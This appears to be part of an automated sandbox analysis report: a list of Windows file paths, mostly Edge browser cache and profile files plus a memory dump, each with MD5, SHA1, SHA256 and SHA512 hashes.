SHA1 b4aac81cca8aab9d2c8d437df27818ce87520ebd
SHA256 7a6877d6ab3895ca82b9cf66584e4d420b295e5d8826288c59558f0aa533aa70
SHA512 f5fc1250e56a29565a957d468759b22995c8f16fe90adb4783327579116553bad500677173fb947d024ad749b9ecfc437e191e12a03708fa2b0e992f723757f3

memory/4392-1524-0x0000000000400000-0x0000000000611000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e

MD5 990324ce59f0281c7b36fb9889e8887f
SHA1 35abc926cbea649385d104b1fd2963055454bf27
SHA256 67bcedd3040fc55d968bbe21df05c02b731181541aff4ae72b9205300a4a3ecc
SHA512 31e83da1ac217d25be6e7f35a041881b926f731fff69db6f144e4fe99b696a31f9ab7766ca22cf5a482743c2a2d00a699ca2c2d67837a86c471a2dd3bed9ea1f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\1cff361e-6c6a-4db5-be51-95f3b8a21c9f\index-dir\the-real-index~RFe592f53.TMP

MD5 8c70fd6650b5892915566baad7e7db75
SHA1 3d5004c774a41f1c059a31de3535e5427c64e1e9
SHA256 e1ee79bb62b4878d67b4d9bd6d7492accd8f630acfb5c0f17aef715ca20f6f1e
SHA512 e5472509832afa9b6114acb7bd6d5666ba4af6d21ae82e13c35bf2798d746629e42f15ca77192968ecbc2fae4d9faaa3d669665bc936c11753cd0c8a1a3b2fff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\1cff361e-6c6a-4db5-be51-95f3b8a21c9f\index-dir\the-real-index

MD5 748c24219491788b6d787616d91aa6c0
SHA1 6b46fd47c705697e65f8f25442fd2df6a10b63d3
SHA256 4921ab289cae1faf1cbe1144bc658fd620ec6adbe3fbb31e500f41c8f2f804f9
SHA512 b2d8a09c141670cc443893ac8dc3aa12f2bc530c9a4d0e7847e55d89c8c5bb5f5132bebdaf1b614e6157f08e6267b9590407f98472fcb189b43d5dff114c50f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 7fb11451b25ba27fb1b5501555e5ccc9
SHA1 6740c2e4fed8695d1b145eb66906511f607f2f2b
SHA256 9a379db108ae0b82ba1592a2284dec2a8a3141f0480505e40cfb6efac5d35afd
SHA512 e3a975c2d37b41c9fdb214fd92ed044500673f0f58b6e7e9a6d246367b5cfcefa5221dd495e956d4d689835858f05b46f3b20b1368b2de296cf0b061bd494b89

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 21f2f0bef275a57b30572684410cdf8f
SHA1 bece40526facf95a0d97b072bef6725baba559c5
SHA256 ad1c12d9ed5afe01afc9e0ae2be66767cff31db3bcd3efcbbb1ab42cc174aea6
SHA512 be1f6c61084342cb063d1c2e0e637210af2243d8ebb1e3ac6bf3119f8603edcfeee827b11c559c5ae9909d108dbe0475f3ee5d9e2d601d5d265981701c6b256e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 2e1ef0c9352d4f70995b1eff55811538
SHA1 7f5ed04bc7309e7f29637725fae11f903320d4cf
SHA256 9164984b22b46277bf4d3253ce3ee3a65ca6b33efb06265d0025a314848d0ec8
SHA512 0ce62c1c1953e692f826a28853343a2bafae71d1949aa8ba4260f63a06772e4823fb48d21c417bde7b7b4d2b4907b3d324d1f812446c1b0f30718d565b5ae9bd

C:\Users\Admin\AppData\Local\Temp\811856890180

MD5 0cde60dec65e1286ad373be1758926e1
SHA1 5b1b2f5d416c7c26fb4f071443d8920c1c78f66d
SHA256 6e4e6e9d375e9479e043536fc2a5ed2e9966715f68c4a07eea5d0102f5719956
SHA512 debedadc9e64242ae9e09350c8e5499425bab688c02e420a486a5589d1963787c99fd89f628836ef856a9924b505f2c13dfe88496949acde3f9504d888c3c3f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e1beebf44a6175026114e1d5d06f39c3
SHA1 a12477fc435fee0aee477ee935e094a41b7f4a2b
SHA256 316cfcb8ca011a5088101c6a239f8fb2d3e73845e5be4ddb50de5d2e6aacaba1
SHA512 a71cd68b9cb791785c4c91f87c3f4278b187112e901ad773519180743186e1a49c5c9cff3b4f0c82af2e9bb3a2b25942a696942497f0e38c8c71d2ce349dd764

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\2a3c4fde-3218-4265-bf82-244095dbb8e2\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 d86c2d0a960d9f095de6fdce80f9bda9
SHA1 c3c16b2afbef172b0891281f80677a3966681985
SHA256 ef6b646d0d834ba6396ce67b38e5927ac131d3a3376b9f1a4282a1e8799713c4
SHA512 9d73f96dd819f6e40aa185ffe5043cfdf87cc52437c8c2b1dd7a7bd457d53a7389478867945e8962c2e12f0410b24e82035a0b23c82342a35aef1710a1cf37b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe59adda.TMP

MD5 f7f40979d95cdfbed1680c25850c0307
SHA1 f01a9979e9d9c7f3b2f404c1e886080c2e59c08f
SHA256 afa49b3379fc87c71b8cfed5a808d9e0ee151f8cb1a55af9dec9799ee93af16a
SHA512 4d4103ba40f71827539ae1629748567f7856d399ea203ccb8588126a5d930789b4876ea1cc34c61a7c6bcac834622a536069a182a019cd5123926e3335ff3643

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c18e047dc132269d961b699657d49375
SHA1 b85f22ee76490e14d52d07ba850fb18a27e47b17
SHA256 dd89bb77751dc456bdeb0fefc6da782ee6f22a97ebc7fc7d59dd704dce5d424a
SHA512 ef40f6d8c51be68441653a77b7a1dee55c13dfaa1e33b064b35baf1ca51e2166ab22b3a4b402685575001cb4a2a6a905f4da99ad00faac8286fe9baac44b3df0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4c771030fdbcb5dbb9298c0836c26608
SHA1 bce9d23bc060869aa6a6a30b79510b48fc57fc1d
SHA256 18d0c47fa6c8e3155bfa6d0f5c5560d374d74be44a35bb5a77e91527681165aa
SHA512 c76ddf25bc7e7a879cffb84ebb3240cd93b50943e4648d8de77abf81da6f68db43c83226b82a6c147efc82b22957855efc87bed3df0627f0d820a85a1cc94bc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 37b9bc38b039d3acf2951cff7563fc62
SHA1 751ffa94405dd34c32a24b8df6d5e851a5371ad0
SHA256 c010f9f0267f24beee24b9f8ba64ea57a77a7f575e4311291896f1a855fcc62f
SHA512 2b626ea02c2367a135d326eeb5daf2639f014e1277eb1e727787612a8a18cfd04d999bf79319fec5fe8660a9c88a018827d14d13310b68227c3c707a0491a985